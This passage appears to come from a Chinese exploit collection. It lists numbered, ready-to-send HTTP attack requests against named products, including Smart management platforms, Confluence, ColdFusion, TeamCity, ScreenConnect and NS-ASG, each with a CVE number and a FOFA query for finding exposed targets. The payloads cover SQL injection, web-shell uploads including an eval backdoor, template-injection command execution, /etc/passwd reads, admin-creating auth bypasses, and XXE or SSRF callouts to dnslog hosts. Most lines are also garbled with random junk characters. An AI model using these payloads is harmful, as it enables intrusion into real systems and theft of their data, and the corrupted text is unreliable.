Sec-Fetch-Site: same-origin1 ~8 L, `4 G* m+ Z
X-Forwarded-For: 1.1.1.1! x9 R! R2 n# R9 {4 n( h" |8 g
X-Originating-Ip: 1.1.1.1
# ]- _6 _' U1 S( V1 uX-Remote-Ip: 1.1.1.13 y1 f! t/ c0 Z9 b
X-Remote-Addr: 1.1.1.1
# l, o7 J' i( \4 v$ |5 oTe: trailers: \+ ~, i6 i* `) n; r
Connection: close
! B/ c- J; U, {) b
% @+ {8 I/ K4 psrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456( F" k( D4 W- ~/ g' W
. q+ G* G/ T+ i/ C1 B" k0 W" v& v# [; [ n6 ^1 U
120. 北京百绰智能S40管理平台导入web.php任意文件上传( `$ n/ Y, J( { ~! h! Q9 A
CVE-2024-12533 M0 ~, y: m% U, h$ Z
FOFA:title="Smart管理平台"2 |+ ~" x, k& f8 D; _9 G. i2 m- r3 F
POST /useratte/web.php? HTTP/1.1
; z* \9 a& ?$ zHost: ip:port/ r9 s- k V: G$ R
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
: i' A. ?( z3 U! {9 A$ ^+ xUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko# o% t, V* x) _3 v$ M- c9 R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* N4 U& G/ m& q, G" [1 f7 V
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# F n; e9 s9 _* P+ RAccept-Encoding: gzip, deflate- e% u" `& |' p9 y
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
9 |+ a6 P0 F1 ^1 d6 H' }8 y* L# ZContent-Length: 597, ]: Q' b* A) U* {& H7 | W/ e9 B
Origin: https://ip:port3 K* s# W3 o) a0 k1 x
Referer: https://ip:port/sysmanage/licence.php }& e3 [# k ?, O, k' a3 [+ }
Upgrade-Insecure-Requests: 1& L% {. q& D3 ? m$ X% n/ H
Sec-Fetch-Dest: document
8 P, Z4 C3 o# i' t7 M$ D( ?( m) GSec-Fetch-Mode: navigate
9 Y8 {1 R& r; HSec-Fetch-Site: same-origin
& f5 O7 k- r/ ZSec-Fetch-User: ?1
a0 p( e5 W' D) T v5 LTe: trailers
9 S( q- z: ^* h# Z$ J! @1 o0 `Connection: close; f2 m" w+ T# e6 n& \ _& a
- x" V2 U% `& q/ ^
-----------------------------42328904123665875270630079328
% z2 e; t/ j6 oContent-Disposition: form-data; name="file_upload"; filename="2.php"
2 [; S) W+ ?1 D4 ?Content-Type: application/octet-stream
, V% F! T9 N% Q0 U: E! W
' D$ f: Q9 V+ U& Y! V<?php phpinfo()?>
% {' X/ L6 U/ Z-----------------------------42328904123665875270630079328
) Z7 i) w$ Z9 a; R7 i6 P( zContent-Disposition: form-data; name="id_type"
$ W! i$ N" ]* R/ o
# D# B$ v2 e4 r& x& Q0 F; l( s6 P1
: ?( Q' x/ c k! z- E: `9 W/ Y7 U' H1 Q-----------------------------42328904123665875270630079328: |$ I2 \6 T$ R, h$ h# M
Content-Disposition: form-data; name="1_ck"
: Q! _! d V/ E# ~! J4 A( j- q9 t4 ^* [# o
1_radhttp
& F: p0 T- |0 O" i1 S% O, E. V* j-----------------------------42328904123665875270630079328
7 t- X& \! T$ w! v% g9 q! pContent-Disposition: form-data; name="mode"
. H p5 w6 D, r. m: T
; k3 A. H! K: q4 U* T# E, [import
1 z0 T; \/ J: Z6 c-----------------------------42328904123665875270630079328' P# k0 g! f4 B; W+ X1 o1 z
1 [: \4 U# j" |0 P- i
% I! s- a& F5 c2 L. Q& J文件路径/upload/2.php8 K3 B" o F5 h8 w8 n2 b8 O
, _3 v5 b! N8 D5 I2 ]
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
% t% l' [( Q5 a1 B- K7 f+ \CVE-2024-1918: T2 y+ O2 ^- C3 o
FOFA:title="Smart管理平台"
) _ ?6 B( q: fPOST /useratte/userattestation.php HTTP/1.1
8 P: e0 _8 L% A; v( D+ Q3 y. M+ hHost: 192.168.40.130:8443
4 P4 @; w7 @7 d' z$ vCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
9 N1 ]$ L/ ^( D9 n/ E6 l6 xUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko& q6 C7 C: J' F# ^- ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. B( z3 t, @0 d" m3 O
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 B4 c. ?3 t- R: \4 o: {1 ]Accept-Encoding: gzip, deflate
1 v$ T/ L+ u& c0 tContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
' I0 R4 V) O6 M7 PContent-Length: 5920 v1 Q+ R7 S# v" C! z' J
Origin: https://192.168.40.130:8443+ m9 l/ u0 e2 Z$ m! m
Upgrade-Insecure-Requests: 1
$ Y- _# T$ R9 q) z GSec-Fetch-Dest: document
: e, F, f8 f2 b* @: _# z+ J5 A! ISec-Fetch-Mode: navigate# _8 t, V) i0 `+ m6 t- _) L
Sec-Fetch-Site: same-origin
" M! z1 L+ \- Z1 u2 FSec-Fetch-User: ?1; F. F4 ~0 z9 Y% }1 w$ V; I! J
Te: trailers* D' G5 N4 j3 c
Connection: close: g0 r; V: l% E8 A/ S
8 c( \% J5 N' |" O5 n7 ]3 G
-----------------------------423289041236658752706300793282 v; u5 ?+ b$ Q5 Z
Content-Disposition: form-data; name="web_img"; filename="1.php"5 T8 u6 K4 y- ~$ b0 t9 a
Content-Type: application/octet-stream
s% n- A) F: |$ F; ]( v- c: G: h4 Z8 X
<?php phpinfo();?>
' |: e; y Z |: O-----------------------------42328904123665875270630079328
/ O, k3 d! ], `) f8 @( \Content-Disposition: form-data; name="id_type"
9 J* T Q9 U# J0 d( m ]# n8 h$ ~" N. A
15 [* C/ y4 M7 ^1 x
-----------------------------42328904123665875270630079328
% L) n0 e* N/ v9 a2 ?+ YContent-Disposition: form-data; name="1_ck"
) z3 n1 H p$ g6 B
. C, Q! s$ `6 R! |/ L e1_radhttp0 n) I0 l+ J$ s) U6 P9 E2 O2 q [
-----------------------------42328904123665875270630079328: U [+ |4 Y+ Z2 E
Content-Disposition: form-data; name="hidwel"; ~, k; H! t( N
# W: l, } x( R$ l9 M% C5 ~# _set
4 s! j6 g I5 s6 N2 J1 d& U j-----------------------------42328904123665875270630079328" I' I* K+ i) U
6 j2 [- f1 y# J" I4 l6 ?/ F
1 D) D7 z, ~) h0 f/ Sboot/web/upload/weblogo/1.php
8 v/ X H( x' T! x6 _
9 v$ h+ A0 C! G2 H+ a3 {5 L122. 北京百绰智能s200管理平台/importexport.php sql注入) t% j" j$ `; w" u) M
CVE-2024-27718FOFA:title="Smart管理平台"
, Y( @! [( q' `0 Y5 t% j' ^8 k其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
5 Q/ @1 A" T" a( E* k7 o5 f( CGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
8 r. d/ S3 v# R! B+ ^Host: x.x.x.x
& P" P a( a( I; I$ f7 u4 Y/ hCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
" D: Y0 `3 f) ]: J1 d* k7 d6 e+ |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
4 c+ M1 o' Q" `! q9 S2 JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ v- f" }$ e8 o. VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 @, i1 q/ a0 J
Accept-Encoding: gzip, deflate, br# W/ `0 E+ U) e* R8 R* k$ v
Upgrade-Insecure-Requests: 1' ]: N: s% { H6 P$ I( G8 a! }; S
Sec-Fetch-Dest: document; Z, S7 p2 t* N4 x" h( r, k7 z
Sec-Fetch-Mode: navigate
0 o# z9 c& L- H% Z @: t; cSec-Fetch-Site: none
p7 J4 F8 R/ v5 I7 T7 z( e( qSec-Fetch-User: ?1( s' K. K5 P, a/ D0 M% [
Te: trailers
) S4 x* C8 [' b% l! q& _* w# QConnection: close! E# a& o9 H" O2 Y
4 v% ?2 o* t+ M' k4 W
( b. Z. k1 L8 ], Z8 g123. Atlassian Confluence 模板注入代码执行
( L, N) C3 l3 j2 RFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
# [& s' I: a c+ ^ KPOST /template/aui/text-inline.vm HTTP/1.1
' i3 i5 ~4 |5 E P KHost: localhost:8090
k* f9 h6 S k& Y& H0 tAccept-Encoding: gzip, deflate, br$ b- q8 E/ S1 w; s2 T' O& \
Accept: */*( |9 s4 p2 S% S
Accept-Language: en-US;q=0.9,en;q=0.8( n8 X0 ^; p# J- _1 }5 Z" F D, E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
4 q5 D5 M+ P+ g2 T( dConnection: close$ m3 a. d& D* _: N* E' N2 H6 v
Content-Type: application/x-www-form-urlencoded
0 V9 _4 v6 }7 ?* y7 A6 F3 z5 I4 g; _1 h8 i% o* H7 T
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
7 e/ x9 P& u7 `) S+ }4 j7 r2 m8 i0 f( K+ d
6 [8 D0 j4 q% B$ |
124. 湖南建研工程质量检测系统任意文件上传' s; |) \7 g5 ?6 i9 Z( }# Z. @ k
FOFA:body="/Content/Theme/Standard/webSite/login.css": e- |; u4 w1 S) U+ w
POST /Scripts/admintool?type=updatefile HTTP/1.17 O$ f! Z0 |+ `( H9 c" y7 ]
Host: 192.168.40.130:8282
$ l) Y# r# ?% B3 K# b' r/ G8 n1 _User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36$ ?1 x# Z% q" A2 R, r+ J) l
Content-Length: 726 T* w) B y8 t1 @, d9 J3 J5 ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' V# G' w9 i2 ^" ~& o
Accept-Encoding: gzip, deflate, br! l5 S+ I2 L. h9 J/ { L. Q& R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( B3 T( ~, m( l
Connection: close: c' R4 U0 m K5 d
Content-Type: application/x-www-form-urlencoded8 g, w% P) f$ s
& E F* M5 |( h \filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>& C% v s% t; z2 Y5 P: j
, X: K* ~( T$ i' V, |# ~7 N# k+ l/ O+ Z& \6 C
http://192.168.40.130:8282/Scripts/abcgcg.aspx, ]8 R' v9 H9 Z3 ^5 J
& d- t# h1 @ m$ U
125. ConnectWise ScreenConnect身份验证绕过9 E0 ]) X. \6 y; r+ w/ F
CVE-2024-1709. y' _3 @4 k3 B0 e+ C# r
FOFA:icon_hash="-82958153"1 T! c9 Z" b" J4 Y9 N" y& w! ~
https://github.com/watchtowrlabs ... bypass-add-user-poc* Z' _2 |3 { ], J. Q5 i2 }" L
, P* }/ I, n- Q9 Y9 R0 d7 R0 u8 z" }) ]7 ^2 }! {
使用方法
; U" P5 t3 h1 {' C; d1 vpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
, d: v# F1 Q0 P) o
" o: ~( M, V$ k' X3 U0 }0 c- y
8 k: B. I) B0 i5 }% r- e5 H创建好用户后直接登录后台,可以执行系统命令。
' N5 t( ]- f$ l, N7 u& ?. }3 B$ z+ |, P
126. Aiohttp 路径遍历
% \2 P5 c5 \, x9 x' hFOFA:title=="ComfyUI"6 ]! @% O2 X9 f+ N S
GET /static/../../../../../etc/passwd HTTP/1.10 R7 T2 z! {5 t4 m' m
Host: x.x.x.x/ z/ x/ V( ~% K& r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
" Z' t- \: Q1 e7 g9 CConnection: close
7 {5 [! j' t% |Accept: */*& S" O) I) d9 N& a2 y7 ]
Accept-Language: en
; F/ t! Z6 G4 ~# C- N8 D- yAccept-Encoding: gzip! }* o4 M4 O7 x$ k; m
: E& }3 o& O N- v
: {3 W/ h4 Y7 z0 v4 a
127. 广联达Linkworks DataExchange.ashx XXE
$ ^9 \, W6 \2 r$ P2 [/ k! YFOFA:body="Services/Identification/login.ashx"
4 H' N* C' d& C0 Q; s2 APOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
7 g- o0 \4 I) |; z0 y4 j, S* B0 sHost: 192.168.40.130:88884 |' G o2 {7 Z4 f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36& I2 h, j6 b+ Z. P7 l% k+ ~# b4 e7 t& f0 y
Content-Length: 415/ D. F- h( ?/ y. O6 F2 _& f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ Y) H- f( H1 Z
Accept-Encoding: gzip, deflate' l; g+ G7 I2 v4 Z, D6 M/ s
Accept-Language: zh-CN,zh;q=0.9
* k0 ?8 |+ h# p% v* N+ r; J- n: lConnection: close( i* o: j+ l" O+ c6 X9 Q
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
5 W. m; Y4 Z' X9 n l2 P# oPurpose: prefetch0 f( c0 @+ t, R) j5 s! H2 E; {
Sec-Purpose: prefetch;prerender) m9 b% n- C* c* p5 k3 @
/ {4 w7 T' e' p5 u------WebKitFormBoundaryJGgV5l5ta05yAIe0
$ I, {% ^1 U' [2 r* n7 N& w# B9 M8 kContent-Disposition: form-data;name="SystemName"
( _9 R" B6 L2 s5 Q: T/ d3 D! u z5 a' K, h: [$ ~. z) K
BIM
6 J% Z( O. z9 x/ |' E------WebKitFormBoundaryJGgV5l5ta05yAIe0
8 ?2 }8 M* A! ?1 V8 x% aContent-Disposition: form-data;name="Params"
# J& I2 A2 R9 ]3 SContent-Type: text/plain, [: t+ a, @5 [! Q0 H, b/ [& H
4 G3 D$ x: l2 j8 Q" B6 j4 R6 l<?xml version="1.0" encoding="UTF-8"?>! u$ X! F; u% H7 K$ }; q
<!DOCTYPE test [
/ ~! H! n3 K% U6 H<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
( F+ f7 }/ d, A3 ~$ t]
! ]! m# R$ _# M! J>
! @; r& u( f4 V. t$ z! ]7 I<test>&t;</test>
: L c; O* z7 a; O# @$ h6 d- Q------WebKitFormBoundaryJGgV5l5ta05yAIe0--
* g K2 z; F7 m) C' `; U8 N% x; {# H+ a" A+ s, \7 J
: I! @7 k# D% F* |
7 j2 r; ^; y8 Z- d g128. Adobe ColdFusion 反序列化
8 N% N& q* c$ X X4 u( H9 |. GCVE-2023-38203
6 A, S* f! k$ d: r! r4 {Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)% x; M' r! ?! C
FOFA:app="Adobe-ColdFusion"
" A& [( s% @- z! |5 M7 Q; GPAYLOAD2 q/ _/ e. Z7 B( F, n
# t/ n( F, p {% ?9 ]
129. Adobe ColdFusion 任意文件读取2 l! ]& ?( ^8 Y" I6 P- @) u3 l
CVE-2024-20767+ S7 T$ }2 K+ y
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
# L) K6 L. H6 X1 C4 n; Z+ G第一步,获取uuid
; t9 ~7 | ^; G' x# ^3 VGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
7 u3 F2 G. w; G' L4 A/ z% [, a# J' [Host: x.x.x.x% L# c6 y4 ^5 d+ v8 v) J9 `5 H9 A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36# y8 `3 Z6 e7 `4 X( V( N. L5 o
Accept: */*; j0 }# E; ~0 }' n
Accept-Encoding: gzip, deflate
+ e0 x6 y Z5 y# G4 N# f4 NConnection: close
( e* J. t5 x5 r/ h p! l: b+ _
2 Z% b& N2 A! |* I" }
, b( a' G# r9 L& r第二步,读取/etc/passwd文件 T8 R5 m5 _, X4 C0 e2 O+ I0 Y
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1; R4 N5 t9 ~ Z% Z& v0 a9 r
Host: x.x.x.x/ f4 w' a+ s8 Q8 k0 h" o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
. M" @8 u" @. NAccept: */*
; U; q6 r+ c7 A: ]* gAccept-Encoding: gzip, deflate
4 Y7 ]4 u2 S" WConnection: close
/ J/ q' E0 d2 A7 M1 h& vuuid: 85f60018-a654-4410-a783-f81cbd5000b9
) m, l% \5 U1 r& z6 y$ R5 i7 E- s- g* U9 W: S
" C6 H) \. w8 \: g7 W+ j2 S) w% M6 B130. Laykefu客服系统任意文件上传6 m7 g, I# d; b: a: D
FOFA:icon_hash="-334624619"
, @4 b7 b; m1 @4 b4 I( l% `POST /admin/users/upavatar.html HTTP/1.1
+ S+ \1 g$ d1 p' kHost: 127.0.0.1+ D7 w* ?$ i! k: V
Accept: application/json, text/javascript, */*; q=0.01* C; I4 i9 v# z* e4 Y: S7 ~
X-Requested-With: XMLHttpRequest
& J9 [3 Y7 T5 G2 q; jUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.260 X- y ~/ z' z" o9 T9 Y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR! T* B% i' s$ ]2 g" Y8 e8 ~
Accept-Encoding: gzip, deflate
$ F- g$ K! q" V/ _. |Accept-Language: zh-CN,zh;q=0.9
7 W5 y7 A9 q j P6 P4 X u! A' YCookie: user_name=1; user_id=3
7 D9 V. K- b2 C& ?" h, DConnection: close5 M3 B4 Y5 o4 N! |, V1 i0 F6 ^
: c$ {. n# _6 a6 ?$ d* h------WebKitFormBoundary3OCVBiwBVsNuB2kR
8 Y6 j1 _, I' z0 LContent-Disposition: form-data; name="file"; filename="1.php"
; |! J5 u2 v6 O3 |" l% r# `Content-Type: image/png% f' A6 V5 `/ T- v, L) ^
3 x' N- @* j& L$ T [& t( Z$ T, G<?php phpinfo();@eval($_POST['sec']);?>
: U* }4 f. p7 K* z! `, c------WebKitFormBoundary3OCVBiwBVsNuB2kR--. B1 w9 L! u7 f8 J8 n5 t) z
) G) D* t1 G( {1 k1 B
/ u5 H: o9 M) r J7 y" T131. Mini-Tmall <=20231017 SQL注入
" Z+ q% L) j# b3 J' r* u2 yFOFA:icon_hash="-2087517259": \, k) p G. u& q1 I+ z
后台地址:http://localhost:8080/tmall/admin
0 f6 Y4 ` d* M* K. jhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)2 P( g ]/ [ y& O0 d, o- f
! e. }5 n6 e4 m& I R132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过: l7 ]& K$ {# b5 F4 f, q$ V1 l
CVE-2024-27198
i; A% b4 h, ~FOFA:body="Log in to TeamCity"
) n$ ]! k* a# X# {: l/ r) pPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.12 _! j! F/ V4 @$ y
Host: 192.168.40.130:8111, g) i/ X8 U# `0 [7 {* i( r# D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36) |" f# [- Y: h! H& c
Accept: */*
6 I8 \/ g& f7 v+ z/ Z4 dContent-Type: application/json+ K# M/ W- m' O
Accept-Encoding: gzip, deflate: v b- i' P! y" P8 Z
) F5 G5 N$ m5 W: b& L
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
2 A- [; i' B: K* U
: I( t6 |6 T3 \* @2 O9 j) z
/ ~) j/ a1 t4 s+ H! LCVE-2024-27199' m0 P1 d8 E0 Y% m, ~9 _
/res/../admin/diagnostic.jsp8 o, H7 @8 z c0 {3 i
/.well-known/acme-challenge/../../admin/diagnostic.jsp9 q$ f# s8 ^ i# w5 V# s" H
/update/../admin/diagnostic.jsp7 l, z7 F7 C, W6 C$ O3 S
! n1 P1 T1 G* I. I: S, b
|* ?* ^8 n! SCVE-2024-27198-RCE.py
7 M) U( B' \) P
" A7 n6 z) _/ W' h- d133. H5 云商城 file.php 文件上传
4 o: x, h) j" g* z6 z2 r" w TFOFA:body="/public/qbsp.php"! w9 G% g* Z" l% O4 s1 q. C4 v8 L
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
0 H4 x8 h+ x7 o6 ^# Y) x8 D5 fHost: your-ip
0 N9 |+ l3 @% xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
" ?; l& H) n) u$ iContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx: w9 ^4 e5 ?. ]1 I
+ S, {* @( d, K# S% [4 Z: Z
------WebKitFormBoundaryFQqYtrIWb8iBxUCx
, v0 `9 e* G3 s9 z( L; @Content-Disposition: form-data; name="file"; filename="rce.php"
; N; `2 J! y3 n$ f, A$ N! zContent-Type: application/octet-stream6 ~# I- f$ P* O6 {
& D& [# S8 `. P& y
<?php system("cat /etc/passwd");unlink(__FILE__);?>5 P1 `5 s$ B- T& B1 S
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--- h0 f# a/ A; b0 Q: R0 u; p/ p' `, }
8 D Q9 z7 m+ T1 l3 @1 k
9 b$ @& \. B9 U v: n# Z. ]4 C' B- t2 {3 |- Z6 Y5 X+ P
134. 网康NS-ASG应用安全网关index.php sql注入6 ]& m4 f& X* H
CVE-2024-2330
0 [2 C" z: R7 g1 DNetentsec NS-ASG Application Security Gateway 6.3版本6 i' L: ?7 V+ C' n R
FOFA:app="网康科技-NS-ASG安全网关"4 f' S D3 x3 U( [% W0 b3 F
POST /protocol/index.php HTTP/1.1; A- ?- m* |4 E c2 y1 ~
Host: x.x.x.x
& O8 `+ y/ M1 {* OCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
; a2 [2 G: G2 TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
/ P+ c$ B* K1 p$ DAccept: */*( l' i. N3 S9 G9 C% k7 U
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 s8 e) D. ~6 \6 hAccept-Encoding: gzip, deflate
- V) M2 }! k3 c. Q6 PSec-Fetch-Dest: empty
' J. c/ t- {* L7 ~: Q& Q/ rSec-Fetch-Mode: cors. y- j s e" s& h/ a
Sec-Fetch-Site: same-origin6 ~; t1 L/ n+ e3 O& ]
Te: trailers
# h0 m# u; I0 @% ]$ b/ d6 e; HConnection: close: L1 o; F5 v/ s Y6 K
Content-Type: application/x-www-form-urlencoded
: \7 [9 n/ [/ v4 b2 V" M0 OContent-Length: 263
9 e$ [$ f/ y! X: g; A
% Z0 ~! e/ B6 g8 fjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
' o( G. p( T0 K- C( } p0 H
1 d8 m) ?( \& i5 B* _3 \4 Q8 D" o7 W6 V" n9 k7 }5 B3 c9 C
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入6 Q% O. \7 D7 C. U9 P r
CVE-2024-2022
" b8 C8 {! _5 M. L+ [3 \1 b/ oNetentsec NS-ASG Application Security Gateway 6.3版本1 U# V) }; i b2 h
FOFA:app="网康科技-NS-ASG安全网关"
- @* ~" g7 a' K: _GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.16 ~4 T1 T- X3 c* d* s; B
Host: x.x.x.x
1 u9 W8 _% k* h8 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+ J+ M0 Y5 w# w) Y8 GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 {7 @' `( D, l! E* jAccept-Encoding: gzip, deflate4 L j! v2 ^' a
Accept-Language: zh-CN,zh;q=0.98 }+ D( d$ w- K& h# l" ~+ e. }
Connection: close
, T2 L2 d$ ~- F/ g" x+ N0 ]) ]0 _9 R7 A0 \8 N9 x
8 X- ?( M% a. U/ V) H% O136. NextChat cors SSRF7 D6 W# Y Y8 U8 ^3 s
CVE-2023-497859 Q0 C( \5 B* U0 f( k& H
FOFA:title="NextChat"% O r7 R% A9 A, X* t# T
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
3 O! E7 B8 @% h) J: R, n+ \Host: x.x.x.x:10000- | ]* u. E8 ^
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36. Q: F4 T" j3 y1 Q3 c1 B
Connection: close
+ C$ g3 a- Q3 ~3 G6 [* L" RAccept: */*
* V; @, O; x" u0 K0 B5 d3 Z, q* GAccept-Language: en. I& y6 \0 e! E$ g
Accept-Encoding: gzip0 U0 Z5 D0 X2 a; E. {# ]( {' H
% q6 K$ \+ O; I1 s( _( ^$ t6 [8 V: z: t4 `
137. 福建科立迅通信指挥调度平台down_file.php sql注入- ~; O+ `. K; _1 W1 ?7 R1 g
CVE-2024-2620! J- A$ P+ K" |" v6 G
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
1 I! g5 u+ h4 h3 hGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.18 B5 ]2 J- j5 x& C. l
Host: x.x.x.x! u- U7 a# ^ b+ t6 x+ c4 h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0( ]. E$ t& ]. N; H: F/ f$ J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 ? x6 v! h& f) ]; R; V; e3 R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 a" g6 S+ S- eAccept-Encoding: gzip, deflate, br
) a" F9 G/ f' x* c! FConnection: close
* w7 O) H: r" y) l& qCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj' R+ z1 ^4 X% K: L! a2 S
Upgrade-Insecure-Requests: 1
# ~/ u' Q" G |5 O+ A9 O9 j. H/ Z1 _
) c" Z( {' t# Q( Q
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入) S: h0 q' \ f) W' O- B
CVE-2024-26217 l5 `/ i3 T# m2 b$ B- ^) t
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"0 f2 a& G, Y. k& d( ?6 e! D% N6 q
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1" Y- E- w9 v& _4 Y; d
Host: x.x.x.x
* Y0 Y/ Y! W7 cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.03 t: j) X! b' {( Y+ c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, |4 ` e+ v) q+ _2 @. D( \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% [; j- Q5 S- e2 C* p6 L
Accept-Encoding: gzip, deflate, br" B+ E8 @% R/ P9 ]5 L/ p
Connection: close6 ]& ~3 f$ m* G% z/ Y# m
Upgrade-Insecure-Requests: 1
